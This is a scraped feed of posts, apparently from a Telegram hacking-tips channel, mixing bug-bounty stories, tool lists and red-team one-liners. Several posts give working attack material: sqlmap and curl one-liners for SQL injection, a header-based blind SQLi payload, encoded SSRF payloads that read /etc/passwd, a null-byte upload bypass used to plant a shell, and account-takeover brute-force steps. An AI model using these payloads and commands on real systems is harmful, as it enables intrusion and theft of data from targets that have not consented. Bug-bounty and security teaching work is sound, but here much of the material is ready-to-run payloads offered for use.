Termux All Command [Telegram Group]

[Red Team] Recon Techniques #1: Expanding the Attack Surface Using AS Numbers If a company or organization has its own AS number (Autonomous System Number), we can leverage it to gather further information about IP blocks, domains, and services associated with the target organization, this technique is highly useful in the information-gathering phase to expand the attack surface. Identifying IP blocks associated with the AS number: $ whois -h whois.radb.net -- "-i origin $ASN" | awk '/^route:/ {print $2}' | sort -u > ip-block.txt Scanning the status of active hosts from the IP block list: $ nmap -sn -PS -iL ip-block.txt -v -oG ips.txt Retrieving a list of responsive active IPs: $ cat ips.txt | grep -i up | grep -oP '(?<=Host: )\S+' | httpx -silent Using this technique, we can identify active and relevant services, which can then be explored further to uncover potential vulnerabilities in the identified hosts.

I found LFI Vulnerability via an Image Upload Page🎯 How I did it : First, I used Subfinder to gather all subdomains (Tip: Always configure your API keys for the best results). Then I used the httpx-toolkit tool to collect all alive subdomains into one file. After that, I ran ffuf with my custom wordlist on the file. I found an image upload page during fuzzing. I wrote a shell script and uploaded it. To bypass the filter, I used a null-byte trick: For example, renaming shell.hs to shell.hs%00.png (adding %00.png after shell.hs) Finally, I discovered the LFI vulnerability

Another Bug Bounty Story - 🚨 Blind XSS Escalation: From Bio to Breach: What started as a simple HTML injection vulnerability in the profile bio page escalated into a high-impact Blind XSS attack when a staff member viewed the profile in their internal system. ✅ Impact: The payload executed in the staff panel, exposing sensitive session data like cookies, IP addresses, and full DOM access. This allowed me to capture an image of the staff panel and craft specific payloads to navigate and interact with internal systems dynamically—uncovering critical weaknesses within their infrastructure. 🎯 Recommended tools for BXSS hunters: Online tools: bxsshunter - https://bxsshunter.com/ Link: https[:]//bxsshunter[.]com/ bughunter - https://lnkd.in/ddUfmQx8 Link: https[:]//xss[.]bughunter[.]app/dashboard/payload xss0r - https://xss0r.com/ Link: https[:]//xss0r[.]com Github tool: xsshunter - https://lnkd.in/d5jmgkhw Link: https[:]//github[.]com/trufflesecurity/xsshunter

CloakQuest3r CloakQuest3r is a powerful Python tool meticulously crafted to uncover the true IP address of websites safeguarded by Cloudflare and other alternatives, a widely adopted web security and performance enhancement service. Its core mission is to accurately discern the actual IP address of web servers that are concealed behind Cloudflare's protective shield. Subdomain scanning is employed as a key technique in this pursuit. TOOL GITHUB LINK: https://lnkd.in/dvNMPuge

💡OnionGPT - Have fun! 😁 http://oniongpt6lntsoztgylhju7nmqedlq6fjexe55z327lmxyae3nutlyad[.]onion/

3 Ways to Install Packages in Kali Linux | @TechBolt27 : https://www.youtube.com/watch?v=stRLqy5ARFI

Access onion sites online without Tor browser: https://tor2web.activetk.jp/

100 AI Tools to replace your tedious work: 1. Research - ChatGPT - YouChat - Abacus - Perplexity - Copilot - Gemini 2. Image - Fotor - Stability AI - Midjourney - Microsoft Designer 3. CopyWriting - Rytr - Copy AI - Writesonic - Adcreative AI 4. Writing - Jasper - HIX AI - Jenny AI - Textblaze - Quillbot 5. Website - 10Web - Durable - Framer - Style AI 6. Video - Klap - Opus - Eightify - InVideo - HeyGen - Runway - ImgCreator AI - Morphstudio .xyz 7. Meeting - Tldv - Otter - Noty AI - Fireflies 8. SEO - VidIQ - Seona AI - BlogSEO - Keywrds ai 9. Chatbot - Droxy - Chatbase - Mutual info - Chatsimple 10. Presentation - Decktopus - Slides AI - Gamma AI - Designs AI - Beautiful AI 11. Automation - Make - Zapier - Xembly - Bardeen 12. Prompts - FlowGPT - Alicent AI - PromptBox - Promptbase - Snack Prompt 13. UI/UX - Figma - Uizard - UiMagic - Photoshop 14. Design - Canva - Flair AI - Designify - Clipdrop - Autodraw - Magician design 15. Logo Generator - Looka - Designs AI - Brandmark - Stockimg AI - Namecheap 16. Audio - Lovo ai - Eleven labs - Songburst AI - Adobe Podcast 17. Marketing - Pencil - Ai-Ads - AdCopy - Simplified - AdCreative 18. Startup - Tome - Ideas AI - Namelix - Pitchgrade - Validator AI 19. Productivity - Merlin - Tinywow - Notion AI - Adobe Sensei - Personal AI 20. Social media management - Tapilo - Typefully - Hypefury - TweetHunter https://techtheworld.net

How I stay updated with CVEs 🔥🔥🔥 ? ⚞ curl cvedb.shodan.io/cves | jq | grep "cve_id" For more details 🔥 curl -s cvedb.shodan.io/cves | jq '[.cves | {cveid: .cve_id, summary: .summary}]'

Techniques and Vulnerabilities to Identify Account Takeover: 1. Pre-Account Takeover - How to Hunt: - Register an email without verifying it. - Register again using a different method (e.g., 'sign up with Google’) with the same email. - Check if the application links both accounts. - Try logging in to see if you can access information from the other account. 2. Account Takeover due to Improper Rate Limiting - How to Hunt: - Capture the login request. - Use tools like Burp Suite's Intruder to brute-force the login. - Analyze the response and length to detect anomalies. 3. Account Takeover by Utilizing Sensitive Data Exposure - How to Hunt: - Pay attention to the request and response parts of the application. - Look for exposed sensitive data like OTPs, hashes, or passwords. 4. Login Vulnerabilities - Check for: - Brute-force vulnerabilities. - Auth misconfigurations. - OTP brute-forcing. - JWT misconfigurations. - SQL injection to bypass authentication. - Proper validation of OTP or tokens. 5. Password Reset Vulnerabilities - Check for: - Brute-force vulnerabilities in password reset OTPs. - Predictable tokens. - JWT misconfigurations. - IDOR vulnerabilities. - Host header injection. - Leaked tokens or OTPs in HTTP responses. - Proper validation of OTP or tokens. - HTTP parameter pollution (HPP) 6. XSS to Account Takeover hashtag#bugbounty hashtag#bugbountytips

Oneliners for SQL Injection 💉 : $ echo http://<TARGET> | waybackurls › target.txt ; python3 sqlidetector.py -f target.txt $ subfinder -d http://<TARGET> -silent -all | gau —blacklist ttf,woff,svg,png | sort -u I gf sqli › gf_sqli.txt; sqlmap -m gf_sqli.txt --batch --risk 3 --random-agent | tee -a sqli.txt $ findomain -t http://<TARGET> -q | httpx-silent | anew | waybackurls | gf sqli ›› sqli ; sqlmap -m sqli --batch -- random-agent --level 1 $ cat urls.txt | grep ".php" | sed 's/\. php.*/.php\//' | sort -u | sed s/$/%27%22%60/ | while read url do ; do curl —silent "$url" | grep -qs "You have an error in your SQL syntax" && echo -e "$url \e[1;32mSQLI\e[0m" || echo -e "$url \e[1;31mNot Vulnerable to SQLI Injection \e[0m" ; done - Header-Based Blind SQL injection: $ cat domain.txt | httpx-silent -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(13),0))OR" -rt -timeout 20 -mrt '>13' hashtag#bugbounty hashtag#bugbountytip hashtag#cybersecurity hashtag#sqli

BD Sign in How To Increase Max Upload File Size Importing of Large SQL files in Xampp | phpmyadmin : BD Sign in How To Increase Max Upload File Size Importing of Large SQL files in Xampp | phpmyadmin : https://www.youtube.com/watch?v=PvSWU9huKDY

file:/etc/passwd%3F/ file:/etc%252Fpasswd/ file:/etc%252Fpasswd%3F/ file:///etc/%3F/../passwd file:${br}/et${u}c%252Fpas${te}swd%3F/ file:$(br)/et$(u)c%252Fpas$(te)swd%3F/ use this payload for ssrf

Reduce Noise in Burp Suite with This Simple Trick! 🔥 💡 Just add the following patterns in Burp Suite under Proxy > Options > TLS Pass Through: BUG BOUNTY TIPS 💪 Top 10 Websites for Beginners to Know This. Use For:- 1. Certificate transparency logs. :- https://crt.sh/ 2. Nuclei Templates Directory :- https://lnkd.in/gCAnE5tR 3. Recon methodology and oneliner commands :- https://lnkd.in/gqzkZNYN 4. Old HackerOne Reports :- https://lnkd.in/gSwe-yuf 5. Onelinertips and Tools and Extensions :- https://lostsec.xyz/ 6. Nslookup, whois, and reverse lookup :- https://ping.eu/ 7. Check status code and response headers :- https://httpstatus.io/ 8. Create vulnerability reports :- https://vulnrepo.com/ 9. Blind XSS :- https://xss.report/ 10. Advanced search operators (Google Dorks) :- https://lnkd.in/g2ahA3YD hashtag#bugbounty hashtag#bugbountytip

Reduce Noise in Burp Suite with This Simple Trick! 🔥 💡 Just add the following patterns in Burp Suite under Proxy > Options > TLS Pass Through: .*\.google\.com .*\.gstatic\.com .*\.googleapis\.com .*\.pki\.goog .*\.mozilla\..* hashtag#bugbounty hashtag#bugbountytip

Rate Limit Bypasses? Here are 10 blogs to learn more about it 1. https://lnkd.in/gYK4kyVU 2. https://lnkd.in/gi2QEr8P 3. https://lnkd.in/gMcSYWzw 4. https://lnkd.in/gv7HFEtf 5. https://lnkd.in/gZnq33Cd 6. https://lnkd.in/gsjiv8ff 7. https://lnkd.in/gdd4Q4_y 8. https://lnkd.in/gDwueZ9u 9. https://lnkd.in/gbTvHfFn 10. https://lnkd.in/gv8wYGdJ

I found two vulnerabilities in a public target on HackerOne in just 10 minutes🎯 How I did it : First, I used Subfinder to gather all subdomains (Tip: Always configure your API keys for the best results). Then I used the httpx-toolkit tool to collect all subdomains returning a 404 status code into one file. Then I ran ffuf with my custom wordlist on the 404 subdomains, which revealed two interesting URLs: https://[target].com/swagger/index.html Then I used the nuclei tool with a Swagger template on the identified URLs and I discovered: HTML Injection Cross-Site Scripting (XSS) #Collected

Search engine for hackers/pentesters https://shodan.io == servers https://google.com == dorks https://wigle.net == wifi networks https://grey.app == code search https://app.binaryedge == threat intelligence https://onyphe.io == server https://viz.greynoise.io == threat intelligence https://censys.io == server https://hunter.io == email addresses https://fofa.info == threat intelligence https://zoomeye.org == threat intelligence https://leakix.net == threat intelligence https://intelx.io == OSINT https://app.netlas.io == attack surface https://searchcode.com == code search https://urlscan.io == threat intelligence https://publicwww.com == code search https://fullhunt.io == attack surface https://socradar.io == threat intelligence https://binaryedge.io ==attack surface https://ivre.rocks == server https://crt.sh == certificate search https://vulners.com == vulnerabilities https://pulsedive.com == threat intelligence

Real Ethical Hacking in 43 Hours: Your Fast-Track to Cybersecurity Mastery Elevate your cybersecurity career with our comprehensive ethical hacking course. Key Topics Covered: * Ethical Hacking Foundations * Introduction to Ethical Hacking * Ethical Hacking Steps * Creating Your Ethical Hacking Lab * Operating System Fundamentals * Vulnerability Assessment * OSINT Techniques * Storage Media * Linux Basics * Linux Shell * Linux Processes * Linux Permissions * Network Security Concepts * Packet Management Systems * Network Security * Linux File System * Working with Archives * Working with Processes * Working with Users * Networking Fundamentals * Network Capture * Network Scanning * Advanced Networking Topics * Information Gathering * Web Application Hacking * Detecting Web Vulnerabilities * The Importance of Programming * C++ and C * SQL and Relational Databases * Functions in C++ * Ethical Hacking for Data Scientists * Ethical Hacking for SQL Datatypes * Learning Python for Ethical Hacking Gain hands-on experience with industry-standard tools like Kali Linux, Metasploit, and Nmap. Prepare for and ace certifications like CSEH and CEH. Download Link: https://lnkd.in/dnXx6G6H

A Chrome extension that keeps track of the injected urls with Blind XSS payloads 🔗 GitHub Link: https://lnkd.in/gmQscCKZ